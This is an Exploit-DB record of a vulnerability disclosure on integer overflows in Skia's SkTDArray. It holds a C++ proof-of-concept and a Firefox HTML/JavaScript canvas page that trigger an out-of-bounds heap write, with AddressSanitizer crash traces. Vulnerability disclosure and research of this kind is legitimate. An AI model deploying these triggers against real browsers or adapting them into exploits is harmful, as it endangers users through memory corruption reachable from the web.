"2018-05-25T00:00:00", "id": "EDB-ID:44759", "href": "https://www.exploit-db.com/exploits/44759/", "sourceData": "<!--\r\nSkia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674\r\nMozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941\r\n\r\n\r\nIn Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:\r\n\r\n(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369\r\n(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382\r\n(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383\r\n\r\nand possibly others\r\n\r\nIn addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as\r\n\r\nfReserve * sizeof(T)\r\nsizeof(T) * count\r\n\r\netc. are used.\r\n\r\nAn integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element.\r\n\r\nI have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths.\r\n\r\nThe PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows.\r\n\r\nPoC program for Skia\r\n\r\n=================================================================\r\n\r\n#include <stdio.h>\r\n\r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkGradientShader.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkDashPathEffect.h\"\r\n\r\nint main (int argc, char * const argv[]) {\r\n\r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(500, 500);\r\n\r\n //Create Canvas\r\n SkCanvas canvas(bitmap);\r\n\r\n SkPaint p;\r\n p.setAntiAlias(false);\r\n float intervals[] = { 0, 10e9f };\r\n p.setStyle(SkPaint::kStroke_Style);\r\n p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0));\r\n\r\n SkPath path;\r\n \r\n unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0};\r\n path.moveTo(0, 0);\r\n unsigned numpoints = 1;\r\n unsigned i = 1;\r\n unsigned qaindex = 0;\r\n while(numpoints < 2147483647) {\r\n if(numpoints == quadraticarr[qaindex]) {\r\n path.quadTo(i, 0, i, 0);\r\n qaindex++;\r\n numpoints += 2;\r\n } else {\r\n path.lineTo(i, 0);\r\n numpoints += 1;\r\n }\r\n i++;\r\n if(i == 1000000) {\r\n path.moveTo(0, 0);\r\n numpoints += 1;\r\n i = 1;\r\n }\r\n }\r\n\r\n printf(\"done building path\\n\");\r\n\r\n canvas.drawPath(path, p);\r\n\r\n return 0;\r\n}\r\n\r\n=================================================================\r\n\r\nASan output:\r\n\r\nASAN:DEADLYSIGNAL\r\n=================================================================\r\n==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0)\r\n #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65)\r\n #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c)\r\n #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17\r\n #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21\r\n #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9\r\n #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688\r\n #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14\r\n #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12\r\n #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24\r\n #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18\r\n #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9\r\n #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226\r\n #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9\r\n #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5\r\n #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5\r\n #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519)\r\n\r\nThe issue can also be triggered via the web in Mozilla Firefox\r\n\r\nPoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer)\r\n\r\n=================================================================\r\n-->\r\n\r\n<canvas id=\"canvas\" width=\"64\" height=\"64\"></canvas>\r\n<br>\r\n<button onclick=\"go()\">go</button>\r\n<script>\r\nvar canvas = document.getElementById(\"canvas\");\r\nvar ctx = canvas.getContext(\"2d\");\r\n\r\nfunction go() {\r\n ctx.beginPath();\r\n\r\n ctx.mozImageSmoothingEnabled = false;\r\n ctx.webkitImageSmoothingEnabled = false;\r\n ctx.msImageSmoothingEnabled = false;\r\n ctx.imageSmoothingEnabled = false;\r\n\r\n linedasharr = [0, 1e+37];\r\n ctx.setLineDash(linedasharr);\r\n\r\n quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613];\r\n ctx.moveTo(0, 0);\r\n numpoints = 1;\r\n i = 1;\r\n qaindex = 0;\r\n while(numpoints < 2147483647) {\r\n if(numpoints == quadraticarr[qaindex]) {\r\n ctx.quadraticCurveTo(i, 0, i, 0);\r\n qaindex++;\r\n numpoints += 2;\r\n } else {\r\n ctx.lineTo(i, 0);\r\n numpoints += 1;\r\n }\r\n i++;\r\n if(i == 1000000) {\r\n ctx.moveTo(0, 0);\r\n numpoints += 1;\r\n i = 1;\r\n }\r\n }\r\n\r\n alert(\"done building path\");\r\n\r\n ctx.stroke();\r\n\r\n alert(\"exploit failed\");\r\n}\r\n\r\n</script>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan output:\r\n\r\nAddressSanitizer:DEADLYSIGNAL\r\n=================================================================\r\n==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0)\r\n==37732==The signal is caused by a WRITE memory access.\r\n #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17\r\n #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342\r\n #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15\r\n #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688\r\n #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19\r\n #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12\r\n #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37\r\n #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25\r\n #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15\r\n #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235\r\n #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23\r\n #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12\r\n #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11\r\n #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13\r\n #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13\r\n #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15\r\n #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467\r\n #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14\r\n #18 0x1a432b56061a (<unknown module>)\r\n-->", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44759/"}]}
